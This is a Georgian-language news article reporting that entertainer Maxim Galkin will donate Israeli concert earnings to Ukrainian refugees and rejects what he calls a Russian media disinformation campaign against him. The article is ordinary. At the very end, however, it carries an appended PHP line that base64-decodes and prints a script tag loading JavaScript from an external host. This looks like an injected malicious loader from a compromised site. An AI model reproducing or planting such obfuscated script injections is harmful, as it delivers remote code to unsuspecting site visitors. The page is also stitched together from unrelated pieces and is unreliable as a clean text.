celsiusi
ავერსი შნაიდერი
კომიკოსმა, პაროდისტმა, მომღერალმა და ტელეწამყვანმა მაქსიმ გალკინმა ვიდეომიმართვაში განაცხადა, რომ ისრაელში გამომუშავებულ თანხას, უკრაინის დასახმარებლად გადარიცხავს.
 
“გადავწყვიტე ჩემი გამომუშავებული თანხის ნაწილი გადამერიცხა უკრაინელი ლტოლვილების დასახმარებლად. ვფიქრობ, ვინც უკვე იყიდა ბილეთები, სიამოვნებით გაიგებს, რომ ამ გზით ჩვენ ერთად კეთილ საქმეს ვაკეთებთ. იმას რაც უკრაონაში ხდება, უდიდესი ადამიანური ტრაგედიაა,” – განაცხადა გალკინმა.
 
მაქსიმ გალკინი რუსულ მედიაში მისი მისამართით წარმოებულ შავ კამპანიას რამდენიმე დღის წინ  გამოეხმაურა და თქვა რომ ეს ყველაფერი მიზანმიმართულად კეთდება, რათა მას რეპუტაცია შეელახოს.
 
“ხალხნო, თქვენ ალბათ ხვდებით, რომ ჩემმა პროფესიამ მიმაჩვია მედიის ყურადღების ცენტრში ყოფნას, ბევრი რამე დაწერილა ჩემს შესახებ, თუმცა ახლა რაც იწერება არ შემიძლია ამასთან დაკავშირებით კომენტარი არ გავაკეთო. ახლა რა დეზინფომაციასაც ავრცელებს რუსული მედია ჩემზე, ამის მოსმენაც კი სასაცილოა.
 
დღეს ყველა რუსული მედია ჩემზე წერს, რომ თითქოს ვიღაცის მკვლელობაში ვარ ეჭვმიტანილი, თითქოს ვიღაცა მოვკალი, თითქოს პოლიციამ დამაკავა, რომ თითქოს ბავშვები სკოლაში ვერ დადიან, თითქოს ალა ძალიან ცუდად არის- ეს ყველაფერი იწერება იმისთვის, რომ რეპუტაცია შემელახოს. სინამდვილეში, მინდა გითხრათ, რომ ყველანი ძალიან კარგად ვართ!
 
ახლა, აიღეთ ეს ფურცელში, სადაც ამ ყველაფერს წერთ და გამოიხოცეთ ერთი ადგილი.. თუმცა მე მესმის რომ თქვენ სიმართლეს ვერ დაწერთ, რადგან სიმართლის წერას ხელმძღვანელობა გიკრძალავთ,”- განაცხადა  გალკინმა.
774
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");